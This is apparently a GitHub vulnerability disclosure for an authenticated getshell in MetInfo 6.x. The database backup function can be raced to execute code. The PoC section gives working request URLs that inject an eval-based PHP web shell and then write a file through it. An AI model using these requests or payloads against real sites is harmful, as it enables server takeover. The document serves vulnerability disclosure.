Permalink
Branch: master
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
75 lines (71 sloc) 2.95 KB

The MetInfo 6.x background getshell

Description: An issue was discovered in Metinfo 6.x.An attacker can use backend database backup function to get the web shell.

1.Technical Description:

locate in /app/system/databack/admin/index.class.php line:456 to 478:

  public function dogetsql($table='') {
        global $_M;
        if($_M['form']['tables'] && !$table)$table = $_M['form']['tables'];
        $localurl=$_M['config']['met_weburl'];
        $tablepre=$_M['config']['tablepre'];
        $fileid = isset($_M['form']['fileid']) ? $_M['form']['fileid'] : 1;
        if($table){
            $tables=$table;
        }else{
            $tables=$this->dotableprearray($tablepre);
        }
        
        $sizelimit=2048;
        
        if($fileid==1){
            $random = isset($_M['form']['random']) ? $_M['form']['random'] : met_rand(6);
            $this->docache_write('bakup_tables.php', $tables);
        }elseif(!$tbl){
            $random = isset($_M['form']['random']) ? $_M['form']['random'] : met_rand(6);
            $allidlist=explode('|',$tablestx);
            for($i=0;$i<count($allidlist)-1;$i++){
                $tables[$i]=$allidlist[$i];
            }
        } 

If we post a string type '$tables',the program will execute docache_write locate in line 334 to 351:

  function docache_write($file, $string, $type = 'array'){
  	    global $_M;
   	if(is_array($string))
   	{
   		$type = strtolower($type);
   		if($type == 'array')
   		{
   			$string = "<?php\n return ".var_export($string,TRUE).";\n?>";
   		}
   		elseif($type == 'constant')
   		{
   			$data='';
   			foreach($string as $key => $value) $data .= "define('".strtoupper($key)."','".addslashes($value)."');\n";
   			$string = "<?php\n".$data."\n?>";
   		}
   	}
   	file_put_contents(PATH_WEB.ADMIN_FILE.'/databack/'.$file, $string);
   }

It will create a file named 'bakup_tables.php' locate in /admin/databack/,and we can control the content. But in the end of the function dogetsql,the program will delete the tmpfile 'bakup_tables.php'.

	$this->docache_delete('bakup_tables.php', $tables);

So we need to use Race condition to get the code is executed

2.PoC

Use the Google Chrome open this test site.download the latest version( https://www.mituo.cn/upload/file/MetInfo6.1.3.zip)and build a test site. After the administrator logged in. image We use this url:

http://127.0.0.1/metinfo6.1.3/admin/index.php?n=databack&c=index&a=dogetsql&anyid=13&lang=cn&tables=<?php eval($_GET[2]);?>&fileid=1

image At the same time.We use Race condition.

http://127.0.0.1/metinfo6.1.3/admin/databack/bakup_tables.php?2=file_put_contents('info.php','<?php%20phpinfo();?>');

image Then we can get shell /admin/databack/info.php: image